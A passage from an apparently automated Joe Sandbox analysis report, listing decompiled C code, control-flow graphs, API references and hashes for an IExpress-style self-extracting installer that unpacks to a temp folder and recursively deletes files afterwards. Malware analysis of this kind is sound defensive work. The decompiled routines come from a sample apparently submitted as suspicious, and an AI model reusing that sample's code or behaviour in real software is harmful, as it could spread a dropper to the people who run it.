                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                    • API String ID: 2126469477-58291647
                                                                                                                                                                                                    • Opcode ID: 2054fcae1ca39312c80c3510bdc0e9e62166467820ff6d0dcbe2226687af7f41
                                                                                                                                                                                                    • Instruction ID: 08344e80bb0be4decdcf0e34814f5e5226b40a317a9328cda820042b8cb4a411
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2054fcae1ca39312c80c3510bdc0e9e62166467820ff6d0dcbe2226687af7f41
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50410030A402159BDB30AB35AC49A6A33B8EBA5751F10C165F81DC3991EFB4CFC5DA61
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 522 175467-175484 523 17551c-175528 call 171680 522->523 524 17548a-175490 call 1753a1 522->524 528 17552d-175539 call 1758c8 523->528 527 175495-175497 524->527 529 175581-175583 527->529 530 17549d-1754c0 call 171781 527->530 537 17554d-175552 528->537 538 17553b-175545 CreateDirectoryA 528->538 532 17558d-17559d call 176ce0 529->532 543 1754c2-1754d8 GetSystemInfo 530->543 544 17550c-17551a call 17658a 530->544 541 175585-17558b 537->541 542 175554-175557 call 17597d 537->542 539 175577-17557c call 176285 538->539 540 175547 538->540 539->529 540->537 541->532 551 17555c-17555e 542->551 549 1754fe 543->549 550 1754da-1754dd 543->550 544->528 552 175503-175507 call 17658a 549->552 555 1754f7-1754fc 550->555 556 1754df-1754e2 550->556 551->541 559 175560-175566 551->559 552->544 555->552 557 1754e4-1754e7 556->557 558 1754f0-1754f5 556->558 557->544 561 1754e9-1754ee 557->561 558->552 559->529 562 175568-175575 RemoveDirectoryA 559->562 561->552 562->529
                                                                                                                                                                                                    C-Code - Quality: 75%
                                                                                                                                                                                                    			E00175467(CHAR* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                    				struct _SYSTEM_INFO _v304;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t10;
                                                                                                                                                                                                    				void* _t13;
                                                                                                                                                                                                    				intOrPtr _t14;
                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                    				void* _t28;
                                                                                                                                                                                                    				void* _t29;
                                                                                                                                                                                                    				CHAR* _t48;
                                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                                    				intOrPtr _t61;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t10 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_v8 = _t10 ^ _t49;
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				if(__edx == 0) {
                                                                                                                                                                                                    					_t48 = 0x1791e4;
                                                                                                                                                                                                    					_t42 = 0x104;
                                                                                                                                                                                                    					E00171680(0x1791e4, 0x104);
                                                                                                                                                                                                    					L14:
                                                                                                                                                                                                    					_t13 = E001758C8(_t48); // executed
                                                                                                                                                                                                    					if(_t13 != 0) {
                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                    						_t42 = _a4;
                                                                                                                                                                                                    						if(_a4 == 0) {
                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                    							 *0x179124 = 0;
                                                                                                                                                                                                    							_t14 = 1;
                                                                                                                                                                                                    							L24:
                                                                                                                                                                                                    							return E00176CE0(_t14, 0, _v8 ^ _t49, _t42, 1, _t48);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t16 = E0017597D(_t48, _t42, 1, 0); // executed
                                                                                                                                                                                                    						if(_t16 != 0) {
                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t61 =  *0x178a20; // 0x0
                                                                                                                                                                                                    						if(_t61 != 0) {
                                                                                                                                                                                                    							 *0x178a20 = 0;
                                                                                                                                                                                                    							RemoveDirectoryA(_t48);
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L22:
                                                                                                                                                                                                    						_t14 = 0;
                                                                                                                                                                                                    						goto L24;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(CreateDirectoryA(_t48, 0) == 0) {
                                                                                                                                                                                                    						 *0x179124 = E00176285();
                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					 *0x178a20 = 1;
                                                                                                                                                                                                    					goto L17;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t42 =  &_v268;
                                                                                                                                                                                                    				_t20 = E001753A1(__ecx,  &_v268); // executed
                                                                                                                                                                                                    				if(_t20 == 0) {
                                                                                                                                                                                                    					goto L22;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t48 = 0x1791e4;
                                                                                                                                                                                                    				E00171781(0x1791e4, 0x104, __ecx,  &_v268);
                                                                                                                                                                                                    				if(( *0x179a34 & 0x00000020) == 0) {
                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                    					_t42 = 0x104;
                                                                                                                                                                                                    					E0017658A(_t48, 0x104, 0x171140);
                                                                                                                                                                                                    					goto L14;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				GetSystemInfo( &_v304);
                                                                                                                                                                                                    				_t26 = _v304.dwOemId & 0x0000ffff;
                                                                                                                                                                                                    				if(_t26 == 0) {
                                                                                                                                                                                                    					_push("i386");
                                                                                                                                                                                                    					L11:
                                                                                                                                                                                                    					E0017658A(_t48, 0x104);
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t28 = _t26 - 1;
                                                                                                                                                                                                    				if(_t28 == 0) {
                                                                                                                                                                                                    					_push("mips");
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t29 = _t28 - 1;
                                                                                                                                                                                                    				if(_t29 == 0) {
                                                                                                                                                                                                    					_push("alpha");
                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				if(_t29 != 1) {
                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_push("ppc");
                                                                                                                                                                                                    				goto L11;
                                                                                                                                                                                                    			}




















                                                                                                                                                                                                    0x00175472
                                                                                                                                                                                                    0x00175479
                                                                                                                                                                                                    0x00175481
                                                                                                                                                                                                    0x00175484
                                                                                                                                                                                                    0x0017551c
                                                                                                                                                                                                    0x00175521
                                                                                                                                                                                                    0x00175528
                                                                                                                                                                                                    0x0017552d
                                                                                                                                                                                                    0x0017552f
                                                                                                                                                                                                    0x00175539
                                                                                                                                                                                                    0x0017554d
                                                                                                                                                                                                    0x0017554d
                                                                                                                                                                                                    0x00175552
                                                                                                                                                                                                    0x00175585
                                                                                                                                                                                                    0x00175585
                                                                                                                                                                                                    0x0017558b
                                                                                                                                                                                                    0x0017558d
                                                                                                                                                                                                    0x0017559d
                                                                                                                                                                                                    0x0017559d
                                                                                                                                                                                                    0x00175557
                                                                                                                                                                                                    0x0017555e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175560
                                                                                                                                                                                                    0x00175566
                                                                                                                                                                                                    0x00175569
                                                                                                                                                                                                    0x0017556f
                                                                                                                                                                                                    0x0017556f
                                                                                                                                                                                                    0x00175581
                                                                                                                                                                                                    0x00175581
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175581
                                                                                                                                                                                                    0x00175545
                                                                                                                                                                                                    0x0017557c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017557c
                                                                                                                                                                                                    0x00175547
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175547
                                                                                                                                                                                                    0x0017548a
                                                                                                                                                                                                    0x00175490
                                                                                                                                                                                                    0x00175497
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0017549d
                                                                                                                                                                                                    0x001754ab
                                                                                                                                                                                                    0x001754b4
                                                                                                                                                                                                    0x001754c0
                                                                                                                                                                                                    0x0017550c
                                                                                                                                                                                                    0x00175511
                                                                                                                                                                                                    0x00175515
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175515
                                                                                                                                                                                                    0x001754c9
                                                                                                                                                                                                    0x001754d6
                                                                                                                                                                                                    0x001754d8
                                                                                                                                                                                                    0x001754fe
                                                                                                                                                                                                    0x00175503
                                                                                                                                                                                                    0x00175507
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00175507
                                                                                                                                                                                                    0x001754da
                                                                                                                                                                                                    0x001754dd
                                                                                                                                                                                                    0x001754f7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001754f7
                                                                                                                                                                                                    0x001754df
                                                                                                                                                                                                    0x001754e2
                                                                                                                                                                                                    0x001754f0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001754f0
                                                                                                                                                                                                    0x001754e7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001754e9
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 001754C9
                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0017553D
                                                                                                                                                                                                    • RemoveDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0017556F
                                                                                                                                                                                                      • Part of subcall function 001753A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 001753FB
                                                                                                                                                                                                      • Part of subcall function 001753A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00175402
                                                                                                                                                                                                      • Part of subcall function 001753A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0017541F
                                                                                                                                                                                                      • Part of subcall function 001753A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 0017542B
                                                                                                                                                                                                      • Part of subcall function 001753A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 00175434
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                    • API String ID: 1979080616-186922987
                                                                                                                                                                                                    • Opcode ID: 8b4ccd812aed76a66bac7ae828ed2697984dee87c6e9f4b258290b8aa5da4814
                                                                                                                                                                                                    • Instruction ID: e323a2d09cd7fe3c9bb6a016fe493df675b28b7c3d98dbd05d73e9b0df285f8a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b4ccd812aed76a66bac7ae828ed2697984dee87c6e9f4b258290b8aa5da4814
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 39313671B40A156BCB14AF399D4997E77BBABD1350B44C13AB80ED3990DBF0CE818691
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                    			E00172390(CHAR* __ecx) {
                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                    				char _v276;
                                                                                                                                                                                                    				char _v280;
                                                                                                                                                                                                    				char _v284;
                                                                                                                                                                                                    				struct _WIN32_FIND_DATAA _v596;
                                                                                                                                                                                                    				struct _WIN32_FIND_DATAA _v604;
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				signed int _t21;
                                                                                                                                                                                                    				int _t36;
                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                    				CHAR* _t65;
                                                                                                                                                                                                    				void* _t66;
                                                                                                                                                                                                    				signed int _t67;
                                                                                                                                                                                                    				signed int _t69;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                                                                                                                                                    				_t21 =  *0x178004; // 0x4ffa21aa
                                                                                                                                                                                                    				_t22 = _t21 ^ _t69;
                                                                                                                                                                                                    				_v8 = _t21 ^ _t69;
                                                                                                                                                                                                    				_t65 = __ecx;
                                                                                                                                                                                                    				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                                                                                                                                                    					L10:
                                                                                                                                                                                                    					_pop(_t62);
                                                                                                                                                                                                    					_pop(_t66);
                                                                                                                                                                                                    					_pop(_t46);
                                                                                                                                                                                                    					return E00176CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					E00171680( &_v276, 0x104, __ecx);
                                                                                                                                                                                                    					_t58 = 0x104;
                                                                                                                                                                                                    					E001716B3( &_v280, 0x104, "*");
                                                                                                                                                                                                    					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                                                                                                                                                    					_t63 = _t22;
                                                                                                                                                                                                    					if(_t63 == 0xffffffff) {
                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					do {
                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                    						_t58 = 0x104;
                                                                                                                                                                                                    						E00171680( &_v276, 0x104, _t65);
                                                                                                                                                                                                    						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                                                                                                                                                    							_t58 = 0x104;
                                                                                                                                                                                                    							E001716B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                                                                                                                                                    							SetFileAttributesA( &_v280, 0x80);
                                                                                                                                                                                                    							DeleteFileA( &_v280);
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                                                                                                                                                    								E001716B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                                                                                                                                                    								_t58 = 0x104;
                                                                                                                                                                                                    								E0017658A( &_v280, 0x104, 0x171140);
                                                                                                                                                                                                    								E00172390( &_v284);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                                                                                                                                                    					} while (_t36 != 0);
                                                                                                                                                                                                    					FindClose(_t63); // executed
                                                                                                                                                                                                    					_t22 = RemoveDirectoryA(_t65); // executed
                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}





















                                                                                                                                                                                                    0x00172398
                                                                                                                                                                                                    0x0017239e
                                                                                                                                                                                                    0x001723a3
                                                                                                                                                                                                    0x001723a5
                                                                                                                                                                                                    0x001723ae
                                                                                                                                                                                                    0x001723b3
                                                                                                                                                                                                    0x001724cb
                                                                                                                                                                                                    0x001724d2
                                                                                                                                                                                                    0x001724d3
                                                                                                                                                                                                    0x001724d4
                                                                                                                                                                                                    0x001724df
                                                                                                                                                                                                    0x001723c2
                                                                                                                                                                                                    0x001723d1
                                                                                                                                                                                                    0x001723db
                                                                                                                                                                                                    0x001723e4
                                                                                                                                                                                                    0x001723f6
                                                                                                                                                                                                    0x001723fc
                                                                                                                                                                                                    0x00172401
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00172407
                                                                                                                                                                                                    0x00172407
                                                                                                                                                                                                    0x00172408
                                                                                                                                                                                                    0x00172411
                                                                                                                                                                                                    0x0017241f
                                                                                                                                                                                                    0x0017247a
                                                                                                                                                                                                    0x00172483
                                                                                                                                                                                                    0x00172495
                                                                                                                                                                                                    0x001724a3
                                                                                                                                                                                                    0x00172421
                                                                                                                                                                                                    0x0017242f
                                                                                                                                                                                                    0x00172453
                                                                                                                                                                                                    0x0017245d
                                                                                                                                                                                                    0x00172466
                                                                                                                                                                                                    0x00172472
                                                                                                                                                                                                    0x00172472
                                                                                                                                                                                                    0x0017242f
                                                                                                                                                                                                    0x001724af
                                                                                                                                                                                                    0x001724b5
                                                                                                                                                                                                    0x001724be
                                                                                                                                                                                                    0x001724c5
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x001724c5

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,00178A3A,001711F4,00178A3A,00000000,?,?), ref: 001723F6
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,001711F8), ref: 00172427
                                                                                                                                                                                                    • lstrcmpA.KERNEL32(?,001711FC), ref: 0017243B
                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00172495
                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 001724A3
                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(00000000,00000010), ref: 001724AF
                                                                                                                                                                                                    • FindClose.KERNELBASE(00000000), ref: 001724BE
                                                                                                                                                                                                    • RemoveDirectoryA.KERNELBASE(00178A3A), ref: 001724C5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 836429354-0
                                                                                                                                                                                                    • Opcode ID: 9ba5af2025df59830817542e761fc1b043135ce3ccb7dc1ee1ab90bc03e79392
                                                                                                                                                                                                    • Instruction ID: d5eb65d10f165bf2ca1102c4ec133924405e323e2dec4a2fa7d2754ea8b185eb
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ba5af2025df59830817542e761fc1b043135ce3ccb7dc1ee1ab90bc03e79392
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2318131604740ABD320EB68CC89AEF73FCAFD4315F44892DF59E86690EB749989C752
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 70%
                                                                                                                                                                                                    			E00172BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                    				void* __ebp;
                                                                                                                                                                                                    				long _t4;
                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                    				intOrPtr _t7;
                                                                                                                                                                                                    				void* _t9;
                                                                                                                                                                                                    				struct HINSTANCE__* _t12;
                                                                                                                                                                                                    				intOrPtr* _t17;
                                                                                                                                                                                                    				signed char _t19;
                                                                                                                                                                                                    				intOrPtr* _t21;
                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t4 = GetVersion();
                                                                                                                                                                                                    				if(_t4 >= 0 && _t4 >= 6) {
                                                                                                                                                                                                    					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                                                                                                                                                    					if(_t12 != 0) {
                                                                                                                                                                                                    						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                                                                                                                                                    						if(_t21 != 0) {
                                                                                                                                                                                                    							_t17 = _t21;
                                                                                                                                                                                                    							 *0x17a288(0, 1, 0, 0);
                                                                                                                                                                                                    							 *_t21();
                                                                                                                                                                                                    							_t29 = _t24 - _t24;
                                                                                                                                                                                                    							if(_t24 != _t24) {
                                                                                                                                                                                                    								_t17 = 4;
                                                                                                                                                                                                    								asm("int 0x29");
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t20 = _a12;
                                                                                                                                                                                                    				_t18 = _a4;
                                                                                                                                                                                                    				 *0x179124 = 0;
                                                                                                                                                                                                    				if(E00172CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                                                                                                                                                    					_t9 = E00172F1D(_t18, _t20); // executed
                                                                                                                                                                                                    					_t22 = _t9; // executed
                                                                                                                                                                                                    					E001752B6(0, _t18, _t21, _t22); // executed
                                                                                                                                                                                                    					if(_t22 != 0) {
                                                                                                                                                                                                    						_t32 =  *0x178a3a; // 0x0
                                                                                                                                                                                                    						if(_t32 == 0) {
                                                                                                                                                                                                    							_t19 =  *0x179a2c; // 0x0
                                                                                                                                                                                                    							if((_t19 & 0x00000001) != 0) {
                                                                                                                                                                                                    								E00171F90(_t19, _t21, _t22);
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t6 =  *0x178588; // 0x0
                                                                                                                                                                                                    				if(_t6 != 0) {
                                                                                                                                                                                                    					CloseHandle(_t6);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t7 =  *0x179124; // 0x80070002
                                                                                                                                                                                                    				return _t7;
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x00172c03
                                                                                                                                                                                                    0x00172c0d
                                                                                                                                                                                                    0x00172c18
                                                                                                                                                                                                    0x00172c20
                                                                                                                                                                                                    0x00172c2e
                                                                                                                                                                                                    0x00172c32
                                                                                                                                                                                                    0x00172c36
                                                                                                                                                                                                    0x00172c3d
                                                                                                                                                                                                    0x00172c43
                                                                                                                                                                                                    0x00172c45
                                                                                                                                                                                                    0x00172c47
                                                                                                                                                                                                    0x00172c49
                                                                                                                                                                                                    0x00172c4e
                                                                                                                                                                                                    0x00172c4e
                                                                                                                                                                                                    0x00172c47
                                                                                                                                                                                                    0x00172c32
                                                                                                                                                                                                    0x00172c20
                                                                                                                                                                                                    0x00172c50
                                                                                                                                                                                                    0x00172c54
                                                                                                                                                                                                    0x00172c57
                                                                                                                                                                                                    0x00172c64
                                                                                                                                                                                                    0x00172c66
                                                                                                                                                                                                    0x00172c6b
                                                                                                                                                                                                    0x00172c6d
                                                                                                                                                                                                    0x00172c74
                                                                                                                                                                                                    0x00172c76
                                                                                                                                                                                                    0x00172c7c
                                                                                                                                                                                                    0x00172c7e
                                                                                                                                                                                                    0x00172c87
                                                                                                                                                                                                    0x00172c89
                                                                                                                                                                                                    0x00172c89
                                                                                                                                                                                                    0x00172c87
                                                                                                                                                                                                    0x00172c7c
                                                                                                                                                                                                    0x00172c74
                                                                                                                                                                                                    0x00172c8e
                                                                                                                                                                                                    0x00172c95
                                                                                                                                                                                                    0x00172c98
                                                                                                                                                                                                    0x00172c98
                                                                                                                                                                                                    0x00172c9e
                                                                                                                                                                                                    0x00172ca7

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetVersion.KERNEL32(?,00000002,00000000,?,00176BB0,00170000,00000000,00000002,0000000A), ref: 00172C03
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00176BB0,00170000,00000000,00000002,0000000A), ref: 00172C18
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00172C28
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00176BB0,00170000,00000000,00000002,0000000A), ref: 00172C98
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_170000_file.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                    • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                    • API String ID: 62482547-3460614246
                                                                                                                                                                                                    • Opcode ID: 7d1a9b694665616e306991bd4160dfbe965fd1eee6d1e8d247f89292673f075c
                                                                                                                                                                                                    • Instruction ID: 73e11b716938064739cad3a4caeef8fce4adc0c44f0abd03994e0e7f3991214a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7d1a9b694665616e306991bd4160dfbe965fd1eee6d1e8d247f89292673f075c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1111E5713403056BE7226BB5AC89A6F3779DFA43A0B648425F90CD3651EB74DCC38661
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E00176F40() {
                                                                                                                                                                                                    
                                                                                                                                                                                                    				SetUnhandledExceptionFilter(E00176EF0); // executed
                                                                                                                                                                                                    				return 0;
                                                                                                                                                                                                    			}



                                                                                                                                                                                                    0x00176f45
                                                                                                                                                                                                    0x00176f4d

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00176F45
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.395541729.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.395528885.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395552778.0000000000178000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.395563684.000000000017A000.00000002.00000001.01000000.00000003.sdmpDownload File
